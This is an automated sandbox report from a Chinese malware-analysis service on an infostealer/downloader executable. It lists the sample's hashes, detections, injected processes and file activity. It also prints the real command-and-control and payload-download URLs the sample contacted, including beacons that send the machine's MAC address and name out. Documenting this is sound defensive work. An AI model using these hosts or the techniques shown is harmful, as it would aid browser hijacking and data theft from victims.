魔盾安全分析报告

分析类型 开始时间 结束时间 持续时间 分析引擎版本
FILE 2020-04-08 20:44:40 2020-04-08 20:46:46 126 秒 1.4-Maldun
虚拟机机器名 标签 虚拟机管理 开机时间 关机时间
win7-sp1-x64-shaapp01-1 win7-sp1-x64-shaapp01-1 KVM 2020-04-08 20:44:41 2020-04-08 20:46:48
魔盾分数

10.0

Infostealer

文件详细信息

文件名 mir.exe
文件大小 155136 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
CRC32 83037713
MD5 8c94cc081cdb526531997c64d1289e99
SHA1 a1e4cf06b9d00b4a4910b4b754f07856432a4e69
SHA256 7efe2742331e3a079427defa5ba50fa93065c5d8697b0c56c5061ba3efa9e590
SHA512 3db91a5a3646131af60db31a43ebaf7e6f8a6fd2c6c81e1de0815801f9655ef1144a11918940b40aabb55d2ccfaa33b5315ce9a8bf6bdbed918640b877c0117f
Ssdeep 3072:Mhb//xQMZDq/qh9B3pU3FsUdS8WOjym6FHXiZRVMYj1Dkg:MZ/xQMZeaf3WeOS873OcMYj1Dkg
PEiD 无匹配
Yara
  • DebuggerTiming__PerformanceCounter ()
  • DebuggerTiming__Ticks (Detected timing ticks function)
  • anti_dbg (Detected self protection if being debugged)
  • inject_thread (Detected code injection function with CreateRemoteThread in a remote process)
  • network_tcp_socket (Detected network communications over RAW socket)
  • network_dns (Detected network communications use DNS)
  • create_process (Detection function for creating a new process)
  • escalate_priv (Detected escalate priviledges function)
  • win_token (Affect system token)
  • win_files_operation (Affect private profile)
  • win_private_profile (Detected private profile access function)
  • Maldun_Anomoly_Combined_Activities_6 (Spotted potential malicious behaviors from a small size app, like privilege and system token)
  • Maldun_Anomoly_Combined_Activities_7 (Spotted potential malicious behaviors from a small size target, like process manipultion, privilege, token and files)
  • with_urls (Detected the presence of an or several urls)
  • MD5_Constants (Look for MD5 constants)
  • IsPE32 (Detected a 32bit PE sample)
  • IsWindowsGUI (Detected a Windows GUI sample)
  • HasDebugData (Detected Debug Data)
  • HasRichSignature (Detected Rich Signature)
VirusTotal 无此文件扫描结果

特征

创建RWX内存
魔盾wping.org 域名信誉系统
Greylist: stat.fei163.com
多次尝试建立挂起的进程
网络活动包含了一个以上的不重复的用户代理
Process: mir.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0)
Process: svchost.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Process: svchost.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
对一个无法找到的进程进行重复搜索,可能希望以startbrowser=1选项运行
从文件自身的二进制镜像中读取数据
self_read: process: mir.exe, pid: 2692, offset: 0x00025dfc, length: 0x00000004
self_read: process: svchost.exe, pid: 2912, offset: 0x00000000, length: 0x00000040
self_read: process: svchost.exe, pid: 2912, offset: 0x000000d8, length: 0x000000f8
生成可疑网络流量,可能被用来进行恶意活动
signature: ET POLICY PE EXE or DLL Windows file download HTTP
signature: ET TROJAN Infostealer.Banprox Proxy.pac Download
执行了一个进程并在其中注入代码(可能是在解包过程中)
通过进程尝试长时间延迟分析任务
Process: sesvc.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds
Process: mir.exe tried to sleep 2096 seconds, actually delayed analysis time by 0 seconds
Process: svchost.exe tried to sleep 390 seconds, actually delayed analysis time by 0 seconds
从本地网络浏览器中窃取个人信息
file: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
尝试与一个交换数据流Alternate Data Stream (ADS)交互
file: C:\Windows\fclog_2019-12-10 23:06:27 >>>>>>>>> .txt
file: C:\Windows\fclog_2019-12-10 23:37:12 >>>>>>>>> .txt
尝试创建或更改系统证书
魔盾安全Yara规则检测结果 - 高危
Warning: Detected code injection function with CreateRemoteThread in a remote process
Critical: Spotted potential malicious behaviors from a small size app, like privilege and system token
Critical: Spotted potential malicious behaviors from a small size target, like process manipultion, privilege, token and files
HTTP数据流中包含可疑的恶意软件数据
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/downservers.aspx?ShopId=101308
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/config.txt
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/SuoLock.exe
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/52/x86.dll
suspicious_request: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101072/88/svchnots.exe
suspicious_request: http://47.114.164.183:88/http://47.114.164.183:88/zs.der
suspicious_request: http://47.114.164.183:88/proxy.pac
suspicious_request: http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/content-script.js
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/content-script.js
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/manifest.txt
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/Preferences.txt
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/manifest.txt
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/Preferences.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/path360.txt
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt
suspicious_request: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt
suspicious_request: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/rand.txt
suspicious_request: http://63.141.246.178/101298/Ver.txt
suspicious_request: http://63.141.246.178/101298/Good.jpg
suspicious_request: http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0
suspicious_request: http://63.141.246.178/101298/better.jpg
suspicious_request: http://63.141.246.178/101298/best.jpg
suspicious_request: http://173.208.160.45:666/Ver.php
发起了一些可疑的HTTP请求
url: http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0
url: http://down.fei163.com:88/http://down.fei163.com:88/downservers.aspx?ShopId=101308
url: http://down.fei163.com:88/http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308
url: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/config.txt
url: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll
url: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/SuoLock.exe
url: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/52/x86.dll
url: http://down.fei163.com:88/http://down.fei163.com:88/proxy/101072/88/svchnots.exe
url: http://47.114.164.183:88/http://47.114.164.183:88/zs.der
url: http://47.114.164.183:88/proxy.pac
url: http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/content-script.js
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/content-script.js
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/manifest.txt
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/Preferences.txt
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/manifest.txt
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/Preferences.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/path360.txt
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt
url: http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt
url: http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/rand.txt
url: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
url: http://63.141.246.178/101298/Ver.txt
url: http://63.141.246.178/101298/Good.jpg
url: http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0
url: http://63.141.246.178/101298/better.jpg
url: http://63.141.246.178/101298/best.jpg
url: http://173.208.160.45:666/Ver.php
url: http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
可能是恶意的样本写入可疑的执行文件和库文件到系统目录并执行
Process: c:\windows\addins\suolock.exe
Process: c:\windows\syswow64\sesvc.exe
可能是恶意的样本写入可疑的执行文件并混淆扩展名

运行截图

网络分析

域名解析

域名 响应
stat.fei163.com A 114.55.147.224
down.fei163.com A 47.114.169.177
down.ttwz07.com A 47.114.164.183
sf.ttwz07.com
www.baidu.com CNAME www.a.shifen.com
A 180.101.49.11
A 180.101.49.12
m.baidu.com CNAME wap.n.shifen.com
A 180.101.49.19
A 180.101.49.20
dss1.bdstatic.com CNAME sslbaiduv6.jomodns.com
A 180.163.198.33

TCP连接

IP地址 端口
114.55.147.224 680
114.55.147.224 680
114.55.147.224 680
114.55.147.224 680
114.55.147.224 680
114.55.147.224 680
114.55.147.224 680
173.208.160.45 88
173.208.160.45 666
180.101.49.11 443
180.101.49.11 443
180.101.49.11 443
180.101.49.11 443
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 447
47.114.164.183 88
47.114.164.183 88
47.114.164.183 88
47.114.164.183 447
47.114.164.183 447
47.114.164.183 447
47.114.164.183 447
47.114.164.183 447
47.114.164.183 447
47.114.164.183 447
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
47.114.169.177 88
63.141.246.178 80
63.141.246.178 80

UDP连接

IP地址 端口
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53
192.168.122.1 53

HTTP请求

URL HTTP数据
http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0 
GET http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0 HTTP/1.1
HOST: stat.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/downservers.aspx?ShopId=101308 
GET http://down.fei163.com:88/downservers.aspx?ShopId=101308 HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308 
GET http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308 HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/config.txt 
GET http://down.fei163.com:88/proxy/101308/51/config.txt HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll 
GET http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/SuoLock.exe 
GET http://down.fei163.com:88/proxy/101308/51/SuoLock.exe HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/52/x86.dll 
GET http://down.fei163.com:88/proxy/101308/52/x86.dll HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://down.fei163.com:88/http://down.fei163.com:88/proxy/101072/88/svchnots.exe 
GET http://down.fei163.com:88/proxy/101072/88/svchnots.exe HTTP/1.1
HOST: down.fei163.com
Connection: Close
http://47.114.164.183:88/http://47.114.164.183:88/zs.der 
GET http://47.114.164.183:88/zs.der HTTP/1.1
HOST: 47.114.164.183
Connection: Close
http://47.114.164.183:88/proxy.pac 
GET /proxy.pac HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0)
Host: 47.114.164.183:88
http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51 
GET http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51 HTTP/1.1
HOST: stat.fei163.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/content-script.js 
GET http://down.ttwz07.com:88/cq/101308/360/content-script.js HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js 
GET http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/content-script.js 
GET http://down.ttwz07.com:88/cq/101308/google/content-script.js HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/manifest.txt 
GET http://down.ttwz07.com:88/cq/101308/360/manifest.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/Preferences.txt 
GET http://down.ttwz07.com:88/cq/101308/360/Preferences.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/manifest.txt 
GET http://down.ttwz07.com:88/cq/101308/google/manifest.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/Preferences.txt 
GET http://down.ttwz07.com:88/cq/101308/google/Preferences.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/path360.txt 
GET http://sf.ttwz07.com:447/path360.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt 
GET http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt 
GET http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt 
GET http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/rand.txt 
GET http://sf.ttwz07.com:447/SiFuUrlList/rand.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close
http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 
GET /api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: stat.fei163.com:680
http://63.141.246.178/101298/Ver.txt 
POST /101298/Ver.txt HTTP/1.1
Accept: */*
Referer: http://63.141.246.178/101298/Ver.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178
Content-Length: 0
Cache-Control: no-cache
http://63.141.246.178/101298/Good.jpg 
GET /101298/Good.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://63.141.246.178/101298/Good.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178
http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0 
GET /tongji.php?userid=101298&mac=52:54:00:64:DC:C0 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 173.208.160.45:88
http://63.141.246.178/101298/better.jpg 
GET /101298/better.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://63.141.246.178/101298/better.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178
http://63.141.246.178/101298/best.jpg 
GET /101298/best.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://63.141.246.178/101298/best.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178
http://173.208.160.45:666/Ver.php 
POST /Ver.php HTTP/1.1
Accept: */*
Referer: http://173.208.160.45:666/Ver.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 173.208.160.45:666
Content-Length: 0
Cache-Control: no-cache
http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 
GET /api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: stat.fei163.com:680

静态分析

PE 信息

初始地址 0x00400000
入口地址 0x0040a3b6
声明校验值 0x00000000
实际校验值 0x0002aacc
最低操作系统版本要求 6.0
PDB路径 D:\DownLoader\DownDll\Release\downloader.pdb
编译时间 2020-03-26 20:19:43
载入哈希 b46d492553bdb08f6266b5d2cdbf89c4

PE数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x0001a8bb 0x0001aa00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.65
.rdata 0x0001c000 0x000077a4 0x00007800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.93
.data 0x00024000 0x00003700 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.07
.rsrc 0x00028000 0x00000288 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.85
.reloc 0x00029000 0x00001860 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 6.41

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
RT_MANIFEST 0x00028060 0x00000224 LANG_ENGLISH SUBLANG_ENGLISH_US 5.04 XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

导入

库 IPHLPAPI.DLL:
0x41c010 - GetAdaptersInfo
库 imagehlp.dll:
0x41c1b4 - MakeSureDirectoryPathExists
库 WS2_32.dll:
0x41c184 - connect
0x41c188 - inet_ntoa
0x41c18c - WSAStartup
0x41c190 - htons
0x41c194 - setsockopt
0x41c198 - WSACleanup
0x41c19c - recv
0x41c1a0 - socket
0x41c1a4 - closesocket
0x41c1a8 - gethostbyname
0x41c1ac - send
库 ADVAPI32.dll:
0x41c000 - OpenProcessToken
0x41c004 - AdjustTokenPrivileges
0x41c008 - LookupPrivilegeValueW
库 KERNEL32.dll:
0x41c018 - GetFileAttributesExW
0x41c01c - CreateProcessA
0x41c020 - GetExitCodeProcess
0x41c024 - WaitForSingleObject
0x41c028 - WriteConsoleW
0x41c02c - OutputDebugStringW
0x41c030 - FlushFileBuffers
0x41c034 - CreateFileW
0x41c038 - SetEnvironmentVariableA
0x41c03c - SetEndOfFile
0x41c040 - GetStringTypeW
0x41c044 - GetComputerNameA
0x41c048 - VirtualQuery
0x41c04c - GetPrivateProfileIntA
0x41c050 - WideCharToMultiByte
0x41c054 - Sleep
0x41c058 - GetModuleFileNameW
0x41c05c - MultiByteToWideChar
0x41c060 - GetLastError
0x41c064 - GetPrivateProfileStringA
0x41c068 - LoadLibraryA
0x41c06c - WinExec
0x41c070 - CreateThread
0x41c074 - GetCurrentProcess
0x41c078 - GetModuleHandleW
0x41c07c - OpenProcess
0x41c080 - GlobalAlloc
0x41c084 - CreateRemoteThreadEx
0x41c088 - lstrcmpW
0x41c08c - GetProcAddress
0x41c090 - VirtualAllocEx
0x41c094 - GlobalFree
0x41c098 - Process32FirstW
0x41c09c - Process32NextW
0x41c0a0 - CreateToolhelp32Snapshot
0x41c0a4 - CloseHandle
0x41c0a8 - GetCurrentProcessId
0x41c0ac - GetSystemTime
0x41c0b0 - WriteProcessMemory
0x41c0b4 - EncodePointer
0x41c0b8 - DecodePointer
0x41c0bc - ReadFile
0x41c0c0 - GetSystemTimeAsFileTime
0x41c0c4 - ExitProcess
0x41c0c8 - GetModuleHandleExW
0x41c0cc - AreFileApisANSI
0x41c0d0 - HeapFree
0x41c0d4 - HeapAlloc
0x41c0d8 - GetCommandLineA
0x41c0dc - RaiseException
0x41c0e0 - RtlUnwind
0x41c0e4 - IsDebuggerPresent
0x41c0e8 - IsProcessorFeaturePresent
0x41c0ec - DeleteFileW
0x41c0f0 - HeapSize
0x41c0f4 - EnterCriticalSection
0x41c0f8 - LeaveCriticalSection
0x41c0fc - GetConsoleMode
0x41c100 - ReadConsoleW
0x41c104 - SetLastError
0x41c108 - GetCurrentThreadId
0x41c10c - SetFilePointerEx
0x41c110 - GetStdHandle
0x41c114 - GetFileType
0x41c118 - DeleteCriticalSection
0x41c11c - GetStartupInfoW
0x41c120 - UnhandledExceptionFilter
0x41c124 - SetUnhandledExceptionFilter
0x41c128 - InitializeCriticalSectionAndSpinCount
0x41c12c - TerminateProcess
0x41c130 - TlsAlloc
0x41c134 - TlsGetValue
0x41c138 - TlsSetValue
0x41c13c - TlsFree
0x41c140 - WriteFile
0x41c144 - LoadLibraryExW
0x41c148 - IsValidCodePage
0x41c14c - GetACP
0x41c150 - GetOEMCP
0x41c154 - GetCPInfo
0x41c158 - GetConsoleCP
0x41c15c - GetProcessHeap
0x41c160 - GetModuleFileNameA
0x41c164 - QueryPerformanceCounter
0x41c168 - GetEnvironmentStringsW
0x41c16c - FreeEnvironmentStringsW
0x41c170 - HeapReAlloc
0x41c174 - SetStdHandle
0x41c178 - CompareStringW
0x41c17c - LCMapStringW

投放文件

无信息

行为分析

互斥量(Mutexes)
  • ExtensionDllState
  • IESQMMUTEX_0_208
  • Local\!IETld!Mutex
  • Local\__DDrawExclMode__
  • Local\__DDrawCheckExclMode__
  • Local\DDrawWindowListMutex
  • Local\DDrawDriverObjectListMutex
执行的命令
  • C:\Windows\system32\cmd.exe /c mkdir -p c:\windows\FeiOnline\
  • C:\Windows\addins\SuoLock.exe
  • C:\Windows\SysWOW64\sesvc.exe
  • C:\Windows\SysWOW64\svchost.exe
  • c:\windows\fontclass.exe
  • C:\Windows\System32\svchost.exe
创建的服务 无信息
启动的服务 无信息

进程

mir.exe PID: 2692, 上一级进程 PID: 2320

cmd.exe PID: 2860, 上一级进程 PID: 2692

sesvc.exe PID: 2452, 上一级进程 PID: 2692

svchost.exe PID: 2912, 上一级进程 PID: 2692

svchost.exe PID: 2676, 上一级进程 PID: 2912

svchost.exe PID: 2812, 上一级进程 PID: 2912

访问的文件
  • C:\Windows\Globalization\Sorting\sortdefault.nls
  • C:\Windows
  • C:\Windows\FeiOnline
  • C:\Users\test\AppData\Local\Temp\mir.exe
  • C:\Windows\System32\cmd.exe
  • C:\Windows\FeiOnline\down.ini
  • C:\Windows\SysWOW64
  • C:\Windows\addins
  • C:\Windows\SysWOW64\cqsfConfig.ini
  • C:\Windows\addins\ExtensionDll.dll
  • C:\Windows\addins\SuoLock.exe
  • C:\Windows\SysWOW64\audiodgx.dll
  • C:\Windows\SysWOW64\sesvc.exe
  • C:\Windows\fclog.txt
  • C:\Windows\SysWOW64\cacert.der
  • \Device\KsecDD
  • C:\Windows\fontclass.exe
  • C:\Windows\fontclass.dll
  • C:\Windows\addins\360
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\proxy[1].pac
  • C:\Windows\addins\360\addins
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js
  • C:\Users
  • C:\Users\Administrator
  • C:\Windows\addins\xiaobai
  • C:\Windows\fclog_2019-12-10 23:06:27 >>>>>>>>> .txt
  • C:\Windows\addins\xiaobai\Extensions
  • C:\Windows\addins\xiaobai\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe
  • C:\Users\Administrator\AppData
  • C:\Users\Administrator\AppData\Local
  • C:\Users\Administrator\AppData\Local\Google
  • C:\Users\Administrator\AppData\Local\Google\Chrome
  • C:\Users\Administrator\AppData\Local\Google\Chrome\User Data
  • C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
